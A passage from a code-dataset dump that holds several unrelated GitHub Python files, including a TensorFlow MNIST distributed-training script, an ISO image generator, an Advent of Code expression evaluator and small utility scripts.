tf.Variable(0, trainable=False)\n    @lazy_property\n    def cross_entropy_mean(self):\n        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n            logits = self.y, labels = tf.argmax(self.y_,1)\n        )\n        weighted_cross_entropy = tf.multiply(cross_entropy, self.w)\n        cross_entropy_mean = tf.reduce_mean(weighted_cross_entropy)\n        return cross_entropy_mean\n    @lazy_property\n    def loss(self):\n        regularizer = tf.contrib.layers.l2_regularizer(REGULARIZATION_RATE)\n        regularization = regularizer(self.weights1) + regularizer(self.weights2)\n        return self.cross_entropy_mean + regularization\n\n\n    @lazy_property\n    def learning_rate(self):\n        learning_rate = tf.train.exponential_decay(\n            LEARNING_RATE_BASE,  # base learning rate; the effective rate used for updates\n                                 # decays from this value as training proceeds\n            self.global_step,  # current training step\n            # mnist.train.num_examples / BATCH_SIZE,  # iterations needed to pass over the whole training set\n            1000,\n            LEARNING_RATE_DECAY  # decay rate of the learning rate\n        )\n        return learning_rate\n    @lazy_property\n    def train_step(self):\n        train_step = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(self.loss\n            , global_step=self.global_step)\n        return train_step\n    @lazy_property\n    def correct_prediction_float(self):\n        correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))\n        # this op first casts the boolean prediction vector to floats and then takes\n        # the mean; that mean is the model's accuracy on this batch of data\n        # used for local validation and test\n        correct_prediction_float = tf.cast(correct_prediction, tf.float32)\n        return correct_prediction_float\n\n    @lazy_property\n    def accuracy(self):\n        return tf.reduce_mean(self.correct_prediction_float)\n    
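# [added illustration, not in the original source] a small worked example of the\n    # instance weighting used in cross_entropy_mean above: with per-example\n    # cross-entropies ce = [0.2, 1.0] and weights w = [1.0, 2.0],\n    # tf.multiply(ce, w) -> [0.2, 2.0] and tf.reduce_mean -> 1.1, so transferred\n    # samples can be up- or down-weighted relative to local ones.\n    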
@lazy_property\n    def accuracy_transfer_batch(self):\n        # accuracy on a single batch transferred in from another node\n        y_transfer_infer = self.inference(input_tensor = self.x_transfer, weights1 = self.weights1\n            , biases1 = self.biases1, weights2 = self.weights2, biases2 = self.biases2)\n        correct_prediction_t = tf.equal(tf.argmax(y_transfer_infer, 1), tf.argmax(self.y_transfer, 1))\n        correct_prediction_float_t = tf.cast(correct_prediction_t, tf.float32)\n        accuracy_transfer_batch = tf.reduce_mean(correct_prediction_float_t)\n        return accuracy_transfer_batch\n    @lazy_property\n    def accuracy_weighted_norm(self):\n        # locally weighted accuracy, used to inspect how much the data distributions differ\n        correct_prediction_float_weighted = tf.multiply(self.w, self.correct_prediction_float)\n        accuracy_weighted = tf.reduce_sum(correct_prediction_float_weighted)\n        accuracy_weighted_norm = tf.divide(accuracy_weighted, tf.reduce_sum(self.w))\n        return accuracy_weighted_norm\n    @lazy_property\n    def weights_node_update(self):\n        exp_ = tf.exp(1.0-self.accuracy_transfer_batch)\n        weights_node_update = (self.accuracy_weighted_norm)*exp_\n        return weights_node_update\n    @lazy_property\n    def transfer_weight_1(self):\n        return self.weights_node_update\n    @lazy_property\n    def transfer_weight_2(self):\n        return self.weights_node_update\n    @lazy_property\n    def scalar_loss(self):\n        return tf.summary.scalar('loss', self.loss)\n    @lazy_property\n    def scalar_acc(self):\n        return tf.summary.scalar('accuracy', self.accuracy)\n    @lazy_property\n    def scalar_weight_1(self):\n        return tf.summary.scalar('transfer_weight_1', self.transfer_weight_1)\n    @lazy_property\n    def scalar_weight_2(self):\n        return tf.summary.scalar('transfer_weight_2', self.transfer_weight_2)\n\n    @lazy_property\n    def init_op(self):\n        return tf.initialize_all_variables()\n    # @lazy_property\n    # def prediction(self):\n    #     data_size = int(self.data.get_shape()[1])\n    #     target_size = int(self.target.get_shape()[1])\n    #     weight = tf.Variable(tf.truncated_normal([data_size, target_size]))\n    #     bias = tf.Variable(tf.constant(0.1, shape=[target_size]))\n    #     incoming = tf.matmul(self.data, weight) + bias\n    #     return tf.nn.softmax(incoming)\n\n    # @lazy_property\n    # def optimize(self):\n    #     cross_entropy = -tf.reduce_sum(self.target, tf.log(self.prediction))\n    #     optimizer = tf.train.RMSPropOptimizer(0.03)\n    #     return optimizer.minimize(cross_entropy)\n\n    # @lazy_property\n    # def error(self):\n    #     mistakes = tf.not_equal(\n    #         tf.argmax(self.target, 1), tf.argmax(self.prediction, 1))\n    #     return tf.reduce_mean(tf.cast(mistakes, tf.float32))\nclass ArgmaxModel:\n\n    def __init__(self):\n        self.graph = tf.Graph()\n        self.y_test\n        self.y1\n        self.y2\n        self.y3\n        self.argmax\n        self.correct_prediction\n        self.accuracy\n        self.scalar_acc\n    @lazy_property\n    def y1(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y1-input')\n\n    @lazy_property\n    def y2(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y2-input')\n\n    @lazy_property\n    def y3(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y3-input')\n\n    @lazy_property\n    def y_test(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'test-input')\n    @lazy_property\n    def argmax(self):\n        prediction_prob_sum = self.y1 + self.y2 + self.y3\n        return tf.arg_max(input=prediction_prob_sum, dimension=1)\n    @lazy_property\n    def correct_prediction(self):\n        equal_num = tf.equal(tf.argmax(self.y_test, 1), self.argmax)\n        return tf.cast(equal_num, tf.float32)\n    @lazy_property\n    def accuracy(self):\n        return tf.reduce_mean(self.correct_prediction)\n    @lazy_property\n    def 
scalar_acc(self):\n return tf.summary.scalar('total_acc', self.accuracy)\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib.learn.python.learn.datasets import mnist as MDataset\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.python.framework import dtypes\nimport collections\nDatasets = collections.namedtuple('Datasets', ['train', 'validation', 'test'])\n\ndef extract_DF(datas,labels,weights):\n data = pd.DataFrame(datas)\n label = pd.DataFrame(labels)\n weight = pd.DataFrame(weights)\n frames = [data,label,weight]\n df = pd.concat(frames,axis=1,ignore_index=True)\n return df\n \n\ndef load_data():\n mnist = input_data.read_data_sets(\"./data\", one_hot=True)\n mnist_datasets_load = np.load('./data/mnist_3node_datasets.npz') \n mnist_datasets_load_even = mnist_datasets_load['mnist_even']\n mnist_datasets_load_odd = mnist_datasets_load['mnist_odd']\n mnist_datasets_load_mix = mnist_datasets_load['mnist_mix']\n mnist_odd = Datasets(train = mnist_datasets_load_odd[0], validation = mnist_datasets_load_odd[1], test = mnist_datasets_load_odd[2])\n mnist_even = Datasets(train = mnist_datasets_load_even[0], validation = mnist_datasets_load_even[1], test = mnist_datasets_load_even[2]) \n mnist_mix = Datasets(train = mnist_datasets_load_mix[0], validation = mnist_datasets_load_mix[1], test = mnist_datasets_load_mix[2])\n # weight = np.ones(shape = [train_labels.shape[0],],dtype=np.float32)\n\n mnist_odd_dataset = extract_DF(datas=mnist_odd.train.images,\n weights = np.ones(shape = [mnist_odd.train.images.shape[0],],dtype=np.float32),\n labels = mnist_odd.train.labels )\n mnist_even_dataset = extract_DF(datas=mnist_even.train.images,\n weights = np.ones(shape = [mnist_even.train.images.shape[0],],dtype=np.float32),\n labels = mnist_even.train.labels )\n mnist_mix_dataset = extract_DF(datas=mnist_mix.train.images,\n weights = np.ones(shape = [mnist_mix.train.images.shape[0],],dtype=np.float32),\n labels = mnist_mix.train.labels )\n mnist_all_test = extract_DF(datas=mnist.test.images,\n labels = mnist.test.labels,\n weights = np.ones(shape = [mnist.test.labels.shape[0],]))\n mnist_all_train = extract_DF(datas=mnist.train.images,\n labels = mnist.train.labels,\n weights = np.ones(shape = [mnist.train.labels.shape[0],]))\n return mnist_odd_dataset, mnist_even_dataset, mnist_mix_dataset, mnist_all_test, mnist_all_train\n\n\n\ndataset_0, dataset_1, dataset_2, test_data, train_all = load_data()\nM = Model()\nM1 = Model()\nM2 = Model()\nT = ArgmaxModel()\nsess = tf.Session(graph=M.graph)\nsess1 = tf.Session(graph=M1.graph)\nsess2 = tf.Session(graph=M2.graph)\nsess_tst = tf.Session(graph=T.graph)\n\nwriter = tf.summary.FileWriter(logdir = log_dir, graph = M.graph)\nwriter1 = tf.summary.FileWriter(logdir = log_dir1, graph = M1.graph)\nwriter2 = tf.summary.FileWriter(logdir = log_dir2, graph = M2.graph)\nwriter_tst = tf.summary.FileWriter(logdir = log_tst, graph = T.graph)\nsess.run(M.init_op)\nsess1.run(M1.init_op)\nsess2.run(M2.init_op)\n\ndef transfer(Graph, writer, session, \n dataset_0,\n dataset_1, dataset_2):\n global_step = session.run(Graph.global_step)\n transfer_1_=dataset_1.sample(n=BATCH_SIZE)\n transfer_2_=dataset_2.sample(n=BATCH_SIZE)\n local_0_ = dataset_0.sample(n=BATCH_SIZE)\n\n weights_update_feed_1 = {\n Graph.x_transfer: transfer_1_.iloc[:,range(INPUT_NODE)].as_matrix(),\n Graph.y_transfer: transfer_1_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(),\n Graph.x :local_0_.iloc[:,range(INPUT_NODE)].as_matrix(), \n 
Graph.y_:local_0_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n        Graph.w: local_0_.iloc[:, INPUT_NODE+10].as_matrix()\n    }\n    weights_update_feed_2 = {\n        Graph.x_transfer: transfer_2_.iloc[:,range(INPUT_NODE)].as_matrix(),\n        Graph.y_transfer: transfer_2_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(),\n        Graph.x :local_0_.iloc[:,range(INPUT_NODE)].as_matrix(), \n        Graph.y_:local_0_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n        Graph.w: local_0_.iloc[:, INPUT_NODE+10].as_matrix()\n    }\n    scalar_weight_1, weights_node_1 = session.run([Graph.scalar_weight_1, Graph.transfer_weight_1], feed_dict=weights_update_feed_1 )\n    scalar_weight_2, weights_node_2 = session.run([Graph.scalar_weight_2, Graph.transfer_weight_2], feed_dict=weights_update_feed_2 )\n    writer.add_summary(scalar_weight_1,global_step)\n    writer.add_summary(scalar_weight_2,global_step)\n    # update the weight column of the transferred batches\n    transfer_1_.iloc[:, INPUT_NODE+10] = weights_node_1\n    transfer_2_.iloc[:, INPUT_NODE+10] = weights_node_2\n    return weights_node_1, weights_node_2, transfer_1_, transfer_2_\n\ndef feed(Graph, dataset, batch_size = BATCH_SIZE):\n    feed = dataset.sample(n=batch_size)\n    # feed = train_all.sample(n=BATCH_SIZE)\n    local_feed_0 = {\n        Graph.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n        Graph.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n        Graph.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n    }\n    return local_feed_0\ndef test_feed(y1,y2,y3,Graph,feed_data):\n    pass\n# def train(Graph, local_set, session, )\nfor i in range(TRAINING_STEPS):\n    ##=====================sample and feed training==========================\n    # feed = dataset_0.sample(n=BATCH_SIZE)\n    # # feed = train_all.sample(n=BATCH_SIZE)\n    # local_feed_0 = {\n    #     M.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n    #     M.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n    #     M.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n    # }\n    local_feed_0 = feed(Graph = M, dataset = dataset_0)\n    scalar_loss, _ = sess.run([M.scalar_loss, M.train_step], feed_dict=local_feed_0)\n    writer.add_summary(scalar_loss,i)\n\n    # feed = dataset_1.sample(n=BATCH_SIZE)\n    # # feed = train_all.sample(n=BATCH_SIZE)\n    # local_feed_1 = {\n    #     M1.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n    #     M1.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n    #     M1.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n    # }\n    local_feed_1 = feed(Graph = M1, dataset = dataset_1)\n    scalar_loss1, _ = sess1.run([M1.scalar_loss, M1.train_step], feed_dict=local_feed_1)\n    writer1.add_summary(scalar_loss1,i)\n\n    # feed = dataset_2.sample(n=BATCH_SIZE)\n    # # feed = train_all.sample(n=BATCH_SIZE)\n    # local_feed_2 = {\n    #     M2.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n    #     M2.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n    #     M2.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n    # }\n    local_feed_2 = feed(Graph = M2, dataset = dataset_2)\n    scalar_loss2, _ = sess2.run([M2.scalar_loss, M2.train_step], feed_dict=local_feed_2)\n    writer2.add_summary(scalar_loss2,i)\n    print(i)\n    ##=====================ACCURACY==========================\n    local_feed_0 = feed(Graph = M, dataset = test_data)\n    scalar_acc, validate_acc = sess.run([M.scalar_acc, M.accuracy], feed_dict=local_feed_0)\n    writer.add_summary(scalar_acc, i)\n\n    local_feed_0 = feed(Graph = M1, dataset = test_data)\n    scalar_acc, validate_acc = sess1.run([M1.scalar_acc, M1.accuracy], feed_dict=local_feed_0)\n    writer1.add_summary(scalar_acc, i)\n\n    local_feed_0 = feed(Graph = M2, dataset = test_data)\n    scalar_acc, validate_acc 
= sess2.run([M2.scalar_acc, M2.accuracy], feed_dict=local_feed_0)\n writer2.add_summary(scalar_acc, i)\n ##=====================SUM ACC=============================\n feed_data = test_data.sample(n = BATCH_SIZE)\n feed_x = feed_data.iloc[:,range(INPUT_NODE)].as_matrix()\n feed_y_ = feed_data.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix()\n y0 = sess.run(M.y, feed_dict={M.x: feed_x})\n y1 = sess1.run(M1.y, feed_dict={M1.x: feed_x})\n y2 = sess2.run(M2.y, feed_dict={M2.x: feed_x})\n feed_test = {\n T.y1 : y0,\n T.y2 : y1,\n T.y3 : y2,\n T.y_test : feed_y_\n }\n scalar_acc_tst, tst_acc = sess_tst.run([T.scalar_acc, T.accuracy], feed_dict = feed_test)\n writer_tst.add_summary(scalar_acc_tst, i)\n print('test acc = ', tst_acc)\n ##=====================TRANSFER & UPDATE==========================\n if i%TRANSFER_FRE == 0 and i>=1 :\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M, writer = writer, session = sess, \n dataset_0 = dataset_0,\n dataset_1 = dataset_1, dataset_2 = dataset_2)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_0 = pd.concat([dataset_0, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_0 = pd.concat([dataset_0, transfer_2_], axis=0, ignore_index=True)\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M1, writer = writer1, session = sess1, \n dataset_0 = dataset_1,\n dataset_1 = dataset_0, dataset_2 = dataset_2)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_1 = pd.concat([dataset_1, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_1 = pd.concat([dataset_1, transfer_2_], axis=0, ignore_index=True)\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M2, writer = writer2, session = sess2, \n dataset_0 = dataset_2,\n dataset_1 = dataset_0, dataset_2 = dataset_1)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_2 = pd.concat([dataset_2, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_2 = pd.concat([dataset_2, transfer_2_], axis=0, ignore_index=True)\n\n \n\n\n\n ##================================CONTINUE TRANSFER WEIGHTS = 1 THRE=0==============\n # WEIGHT_THRESHOLD = 0\n # transfer_0_=dataset_0.sample(n=BATCH_SIZE)\n # transfer_1_=dataset_1.sample(n=BATCH_SIZE)\n # transfer_2_=dataset_2.sample(n=BATCH_SIZE)\n # dataset_0 = pd.concat([dataset_0, transfer_1_], axis=0, ignore_index=True)\n # dataset_0 = pd.concat([dataset_0, transfer_2_], axis=0, ignore_index=True)\n # dataset_1 = pd.concat([dataset_1, transfer_0_], axis=0, ignore_index=True)\n # dataset_1 = pd.concat([dataset_1, transfer_2_], axis=0, ignore_index=True)\n # dataset_2 = pd.concat([dataset_2, transfer_0_], axis=0, ignore_index=True)\n # dataset_2 = pd.concat([dataset_2, transfer_1_], axis=0, ignore_index=True)\n\n\n\nwriter.close()\nwriter1.close()\nwriter2.close()\nwriter_tst.close()\nsess.close()\nsess1.close()\nsess2.close()\nsess_tst.close()","repo_name":"YanJiamei/distributed_learning","sub_path":"graphmodel.py","file_name":"graphmodel.py","file_ext":"py","file_size_in_byte":20471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16828176610","text":"import unittest\nimport tensorflow as tf\n\nfrom neurolib.builders.static_builder import StaticBuilder\nfrom neurolib.encoder.seq_cells import BasicEncoderCell, NormalTriLCell\n\n# pylint: disable=bad-indentation, no-member, protected-access\n\n# NUM_TESTS : 3\nrange_from 
= 2\nrange_to = 3\ntests_to_run = list(range(range_from, range_to))\n\n\nclass SeqCellsBasicTest(tf.test.TestCase):\n  \"\"\"\n  \n  \"\"\"\n  def setUp(self):\n    \"\"\"\n    \"\"\"\n    print()\n    tf.reset_default_graph()\n    \n  @unittest.skipIf(0 not in tests_to_run, \"Skipping\")\n  def test_init(self):\n    \"\"\"\n    Create a Custom Cell\n    \"\"\"\n    print(\"Test 0: Custom cell init\")\n    builder = StaticBuilder(scope='BuildCell')\n    \n    cell = BasicEncoderCell(builder, state_sizes=[[5]])\n    print(\"cell.encoder\", cell.encoder)\n    \n  @unittest.skipIf(1 not in tests_to_run, \"Skipping\")\n  def test_call(self):\n    \"\"\"\n    Call a Custom Cell Node\n    \"\"\"\n    print(\"Test 1: Custom cell call\")\n    builder = StaticBuilder(scope='BuildCell')\n    \n    cell = BasicEncoderCell(builder, state_sizes=[[5]])\n    print(\"cell.encoder\", cell.encoder)\n    \n    X = tf.placeholder(tf.float64, [None, 5])\n    Y = tf.placeholder(tf.float64, [None, 10])\n    Z = cell(X, Y)\n    print(\"Z\", Z)\n    \n  @unittest.skipIf(2 not in tests_to_run, \"Skipping\")\n  def test_NormalTriLCell(self):\n    \"\"\"\n    Test the NormalTriLCell Node\n    \"\"\"\n    print(\"Test 2: \")\n    builder = StaticBuilder(scope='BuildCell')\n    \n    cell = NormalTriLCell(builder,\n                          state_sizes=[[5]])\n    print(\"cell.encoder\", cell.encoder)\n    \n    X = tf.placeholder(tf.float64, [None, 5])\n    Y = tf.placeholder(tf.float64, [None, 10])\n    Z = cell(X, Y)\n    print(\"Z\", Z)\n    \nif __name__ == \"__main__\":\n  unittest.main(failfast=True)\n  ","repo_name":"dhernandd/neurolib","sub_path":"neurolib/tests/builders/test_seq_cells.py","file_name":"test_seq_cells.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16130046359","text":"from sys import argv\nfrom os import mkdir, walk\nfrom tomli import load as toml_load\ntry:\n    from cStringIO import StringIO as BytesIO\nexcept ImportError:\n    from io import BytesIO\nfrom pycdlib import PyCdlib\n\nunit_objects = {}\n\n\nclass UnitConfiguration:\n    def __init__(self, unit_number):\n        self.unit_number = unit_number\n        self.file_additions = []\n        self.file_removals = []\n        self.username = \"\"\n        self.password = \"\"\n        self.flags = {}\n\n        self.generate_ssh_token()\n\n    def generate_ssh_token(self):\n        # Generate an ssh token for user here!\n        pass\n\n    def parse_global_configuration(self):\n        # Check if config file provided matches the required format\n        with open(\"./Data/global.toml\", \"rb\") as config_file:\n            config_data = toml_load(config_file)\n        # Load data into instance vars here, looping for values with multiple items?\n\n    def parse_unit_specific_configuration(self):\n        # Check if config file provided matches the required format\n        with open(\"./Data/unit-specific.toml\", \"rb\") as config_file:\n            config_data = toml_load(config_file)[self.unit_number]\n        # Load data into instance vars here, looping for values with multiple items?\n\n    def get_unit_number(self):\n        return self.unit_number\n\n    def get_file_additions(self):\n        return self.file_additions\n\n    def get_file_removals(self):\n        return self.file_removals\n\n    def get_credentials(self):\n        return self.username, self.password\n\n    def get_flags(self):\n        return self.flags\n\n\n# file name fixed to match the \"unit-specific.toml\" path used above\nwith open(\"./Data/unit-specific.toml\", \"rb\") as config_file:\n    units = toml_load(config_file).keys()\n    for unit in units:\n        unit_objects[unit] = UnitConfiguration(unit)\n\n\ndef main():\n    try:\n        extract_image(argv[1], \"./Data/ImageContents\")\n    except FileNotFoundError:\n        print(\"Error, file provided does not exist!\")\n        exit(1)\n    except IndexError:\n        
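# [added note, not in the original source] a missing argv[1] raises IndexError,\n        # i.e. the script was launched without an image path; a hedged usage sketch\n        # (hypothetical file name): python image_generator.py my_image.iso\n        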
print(\"Error, no file name provided!\")\n exit(1)\n\n\ndef extract_image(image_name, output_location):\n image = PyCdlib()\n image.open(image_name)\n directories_to_create = []\n files_to_create = []\n for path, directory_list, file_list in image.walk(iso_path=\"/\"):\n for directory in directory_list:\n directories_to_create.append(str(path + directory))\n for file in file_list:\n files_to_create.append(str(path + file))\n for directory in directories_to_create:\n mkdir(output_location + directory)\n for file in files_to_create:\n image.get_file_from_iso(output_location + file, iso_path=file)\n image.close()\n\n\ndef create_image(image_name: str, input_location):\n image_name = image_name.rstrip(\".iso\")\n for unit in unit_objects:\n image = PyCdlib()\n image.new()\n\n for path, directory_list, file_list in walk(input_location):\n for directory in directory_list:\n image.add_directory(path+directory)\n for file in file_list:\n image.add_file(file, path)\n\n # Do unit specific configurations here (i.e. for file in unit.get_file_removals())\n\n image.write(image_name + str(unit.get_unit_number()) + \".iso\")\n","repo_name":"fourteevee/4tv-deploy","sub_path":"image_generator.py","file_name":"image_generator.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41340817882","text":"from multiprocessing import Process\n\nnumber = 0\ndef change(): # 为拟创建的子进程1提供方法\n print('子进程1开始运行...')\n global number\n for i in range(5000):\n number += 1\n print('把number加5000次一等于:%d' % number)\n print('子进程1结束')\n\ndef changes(): # 为拟创建的子进程2提供方法\n print('子进程2开始运行...')\n global number\n for i in range(10000):\n number += 1\n print('把number加10000次一等于:%d' % number)\n print('子进程2结束')\n\nif __name__ == '__main__':\n process_one = Process(target=change)\n process_one.start() # 启动进程\n process_one.join() # 等待进程执行结束\n process_two = Process(target=changes)\n process_two.start() # 启动进程\n process_two.join() # 等待进程执行结束\n print('number最后为:%d' % number)","repo_name":"ALiang-NO1/python-learn","sub_path":"MyPy/线程-进程-协程/进程/03进程共用全局变量问题.py","file_name":"03进程共用全局变量问题.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42731905590","text":"from utils import read_data\nfrom typing import Tuple, Dict\n\n\ndef find_matching_parens(text: str) -> Dict[int, int]:\n paren_stack = [] # stack of indices of opening parentheses\n parens_dict = {}\n\n for i, char in enumerate(text):\n if char == '(':\n paren_stack.append(i)\n if char == ')':\n try:\n parens_dict[paren_stack.pop()] = i\n except IndexError:\n raise Exception(\"Couldn't parse parens because there are too many closing parenthesis\")\n if paren_stack: # check if stack is empty afterwards\n raise Exception(\"Couldn't parse parens because there are too many opening parentheses\")\n return parens_dict\n\n\nOP_DICT = {\n '+': lambda x, y: x + y,\n '*': lambda x, y: x * y\n}\n\n\ndef evaluate_part_one(expression: str) -> int:\n expression = expression.replace(\" \", \"\")\n parens_dict = find_matching_parens(expression)\n index = 0\n stored_number = None\n stored_op = None\n while index < len(expression):\n char = expression[index]\n if char.isnumeric():\n if stored_number is not None and stored_op is not None:\n stored_number = OP_DICT[stored_op](stored_number, int(char))\n stored_op = None\n elif stored_number is not None and stored_op is None:\n raise Exception(\"Read two numbers 
in a row, what do?\")\n elif stored_number is None:\n stored_number = int(char)\n index += 1\n elif char in ('+', '*'):\n if stored_op is None:\n stored_op = char\n else:\n raise Exception(\"Read two ops in a row, what do?\")\n index += 1\n elif char == '(':\n sub_problem = expression[index+1:parens_dict[index]]\n sub_value = evaluate_part_one(sub_problem)\n if stored_number is not None and stored_op is not None:\n stored_number = OP_DICT[stored_op](stored_number, sub_value)\n stored_op = None\n elif stored_number is not None and stored_op is None:\n raise Exception(\"Read two numbers in a row, what do?\")\n elif stored_number is None:\n stored_number = sub_value\n index = parens_dict[index]+1\n return stored_number\n\n\ndef get_left_num(expression: str, index: int) -> Tuple[int, int]:\n num_start = index\n while num_start - 1 >= 0 and expression[num_start - 1].isnumeric():\n num_start -= 1\n return int(expression[num_start:index]), num_start\n\n\ndef get_right_num(expression: str, index: int) -> Tuple[int, int]:\n num_end = index\n while num_end + 1 < len(expression) and expression[num_end+1].isnumeric():\n num_end += 1\n return int(expression[index+1:num_end+1]), num_end\n\n\ndef evaluate_part_two(expression: str) -> int:\n expression = expression.replace(\" \", \"\")\n while '(' in expression:\n parens = find_matching_parens(expression)\n first_paren = min(parens.keys())\n sub_problem = expression[first_paren + 1:parens[first_paren]]\n sub_value = evaluate_part_two(sub_problem)\n expression = str(sub_value).join((expression[:first_paren], expression[parens[first_paren]+1:]))\n while '+' in expression:\n plus_loc = expression.index(\"+\")\n left_num, left_num_start = get_left_num(expression, plus_loc)\n right_num, right_num_end = get_right_num(expression, plus_loc)\n expression = str(left_num+right_num).join((expression[:left_num_start], expression[right_num_end+1:]))\n while '*' in expression:\n mult_loc = expression.index(\"*\")\n left_num, left_num_start = get_left_num(expression, mult_loc)\n right_num, right_num_end = get_right_num(expression, mult_loc)\n expression = str(left_num * right_num).join((expression[:left_num_start], expression[right_num_end + 1:]))\n return int(expression)\n\n\ndef main():\n expressions = read_data().split(\"\\n\")\n print(f'Part one: {sum(evaluate_part_one(line) for line in expressions)}')\n print(f\"Part two: {sum(evaluate_part_two(line) for line in expressions)}\")\n\n\nif __name__ == '__main__':\n import time\n start = time.monotonic()\n main()\n print(f\"Time: {time.monotonic() - start}\")\n","repo_name":"coandco/advent2020","sub_path":"advent2020_day18.py","file_name":"advent2020_day18.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71366812413","text":"__author__ = 'Administrator'\n# 导入:\nimport controller.base_controller\nfrom model import order_log\nimport json\n\nsession=controller.base_controller.DBSession()\ndef update(day,page):\n new_order = order_log.OrderLog(day=day,page=page)\n # print('************************')\n # print(str(new_order))\n # shop = orders.shop(id='22',name='1',location='2',master='3',telephone='4')\n # session.add(shop)\n session.add(new_order)\n session.commit()\n 
session.close()","repo_name":"huzuohuyou/XiaoHengAnalysis","sub_path":"controller/order_log_controller.py","file_name":"order_log_controller.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"59642103","text":"from contextlib import contextmanager\nfrom time import perf_counter\n\n\n# using context manager decorator, this allows us to create our own context manager\n@contextmanager\ndef timing(label: str):\n \"\"\"\n times the performance of running a function\n :param label: simple label for logging\n \"\"\"\n # section before yield is where we write code before the context manager is called\n # in this case we simply record the timestamp before\n t0 = perf_counter()\n\n # in yield, this is where execution is transferred to the body of your context manager\n # for example, where arrays get created or where we can return data. In this case we\n # simply return a closure which will calculate the time\n yield lambda: (label, t1 - t0)\n\n # this is where we write code that will be executed after the context manager finishes\n # in scenarios like file handling, this is where we close files. in this case this is where\n # we get the final time\n t1 = perf_counter()\n","repo_name":"BrianLusina/PythonSnips","sub_path":"utils/context_mgrs/perf_timer.py","file_name":"perf_timer.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"38205386101","text":"import os\nimport openpyxl\nimport shutil\n\ndef ReadExcel():\n print (\"This May Take Awhile\\n\")\n DataSetPath = os.getcwd()\n DataSetPath = DataSetPath + \"\\Dataset\\mozilla_core.xlsx\"\n \n wb = openpyxl.load_workbook(DataSetPath)\n sheet = wb.active\n\n return sheet\n\n\n\n\ndef FilterResults():\n sheet = ReadExcel()\n Titles = sheet['E']\n NonFuncArr = []\n FuncArr = []\n SubStr1 = \"not working\"\n SubStr2 = \"doesnt work\"\n SubStr3 = \"fail\"\n SubStr4 = \"Crash\"\n SubStr5 = \"Broken\"\n SubStr6 = \"doesn't work\"\n SubStr7 = \"dont work\"\n SubStr8 = \"don't work\"\n\n for data in Titles:\n if type(data.value) is str:\n if SubStr1 in data.value:\n FuncArr.append(data.value)\n elif SubStr2 in data.value:\n FuncArr.append(data.value)\n elif SubStr3 in data.value:\n FuncArr.append(data.value)\n elif SubStr4 in data.value:\n FuncArr.append(data.value)\n elif SubStr5 in data.value:\n FuncArr.append(data.value)\n elif SubStr6 in data.value:\n FuncArr.append(data.value)\n elif SubStr7 in data.value:\n FuncArr.append(data.value)\n elif SubStr8 in data.value:\n FuncArr.append(data.value)\n else:\n NonFuncArr.append(data.value)\n \n\n\n #PerfArr = []\n #SubStr1 = \"slow\"\n #SubStr2 = \"hung\"\n #SubStr4 = \"hanging\"\n\n #for data in Titles:\n # if type(data.value) is str:\n # if SubStr1 in data.value:\n # PerfArr.append(data.value)\n # elif SubStr2 in data.value:\n # PerfArr.append(data.value)\n #elif SubStr3 in data.value:\n # PerfArr.append(data.value)\n #elif SubStr4 in data.value:\n # PerfArr.append(data.value)\n\n\n #SecurArr = []\n #Titles2 = sheet['C']\n #i = 0\n\n #for data in Titles2:\n # if type(data.value) is str:\n # if data.value == 